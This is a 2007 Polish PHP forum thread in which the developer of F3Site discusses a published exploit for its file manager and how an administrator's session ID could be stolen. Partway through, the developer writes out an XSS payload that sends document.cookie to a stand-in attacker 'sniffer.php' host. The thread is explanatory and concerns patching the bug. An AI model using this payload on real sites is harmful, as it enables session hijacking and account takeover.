Podstrony
- telcocafe
- [PHP+MySQL] Problem z połączeniem mysqli('localhost', 'xxx', 'xxx', 'xxx'
- [PHP] Wyrażenia regularne. Zamienić name="info_imie" na name="{info_imie}"
- [php] Dodanie textu do pliku. Problem... :) POMOCY!!!!!!!!!!!!!
- [PHP] Skrypt cenzury Chcę cenzury!!!
- Dobre programy do edycji php Dobre programy do edycji php
- [PHP] podział na strony php: podział na strony
- [PHP i MySQL] jak pobrac liczbe rezultatow Jak pobrac liczbe rezultatow???
- jak zrobic aktualizacje php? pomocy!!!!!
- Błąd w PHP-Fusion pomocy !!!!!
- Daczego nie dziala?? skrypt php nie chce działać!!!
- zanotowane.pl
- doc.pisz.pl
- pdf.pisz.pl
- asfklan.htw.pl
telcocafe
Niedawno opublikowany został exploit, który umożliwia wepchanie pliku na serwer przy pomocy modułu F3Site File Manager, używając prefiksu COOKIES oraz skradzionej sesji admina.http://www.milw0rm.com/exploits/3255
W rzeczywistości wykonanie kodu HTML w polu "autor" było niemożliwe pomimo tego, że można było umieścić większą ilość znaków, niż dozwolona. Prefiks cookies można jednak wykryć w przeglądarce.
Czy możliwość kradzieży ID sesji administratora, znając prefiks cookies, jest w tym przypadku rzeczywiście realny? Jeśli tak - gdzie jest dokładnie błąd?
Użytkownik Ferrari edytował ten post 20 luty 2007, 12:07
jak masz exploita to znaczy że jest to możliwe ;)
Może ktoś mi to wyjaśnić? W jaki sposób można wykraść ID sesji admina (oprócz metody chybił-trafił)?
Celem ataku jest menedżer plików. Może powinienem wprowadzić tam stosowne zabezpieczenie?
najszybciej przez XSS
Atak XSS nie był możliwy w polu "autor". Nie wiem, czy Kacper w ogóle uruchomił swój skrypt - postaram się z nim skontaktować. Przez ten exploit mam brudne "kartoteki".
http://www.google.co...l...=Szukaj&lr=
Przy okazji poprawiam kilka potencjalnych SQL Injection (wstawianie $_SERVER['REMOTE_ADDR'] do bazy bez walidacji).
strip_tags na zmienne z _POST i spokój. Jak chcesz rozwijać skrypt w coś większego to polecam jakiś dobry framework (CI czy Prado) do tego testy jednostkowe jak i testy Selenium - usprawnią testowanie i rozbudowę.
Użytkownik Riklaunim edytował ten post 20 luty 2007, 19:37
Już wiem, jak można przez XSS zdobyć ID sesji. Poniższa informacja z pewnością przyda się wam.
Poniższy przykład wyświetli całą zawartość cookies dla odwiedzanej strony:
alert(document.cookies)
P: Jak przestępca może zobaczyć ID sesji admina?
O: Instrukcja Alert() nie wyśle ID sesji, a jedynie go wyświetli. Jeśli wartość pola formularza nie jest zbadana, można wstawić dowolny kod, nawet aplet Javy. Przykładowy skrypt:
<script>location='http://gang.przestępców.komputerowych/sniffer.php?c='+document. cookie</script>O efekcie nie trzeba nawet dyskutować - jeśli admin wejdzie na stronę, wysłane zostaną nawet jego prywatne dane, o ile pozwoli na to przeglądarka (za chwilę zbadam FF, gdy jest na to podatny).
Wracając do tematu - zagrożenia nie ma, ponieważ wartość pola "autor" w F3Site 2.0 jest nadal SPRAWDZANA (opr. ilości znaków). W F3Site 2.1 poprawiłem błąd.
OSTRZEŻENIE: FF jest podatny na błąd. Na bugzilli chyba nie ma o tym wzmianki.
Użytkownik Ferrari edytował ten post 21 luty 2007, 16:57
OSTRZEŻENIE: FF jest podatny na błąd. Na bugzilli chyba nie ma o tym wzmianki.
eee? :| co ma przeglądarka do błędu app?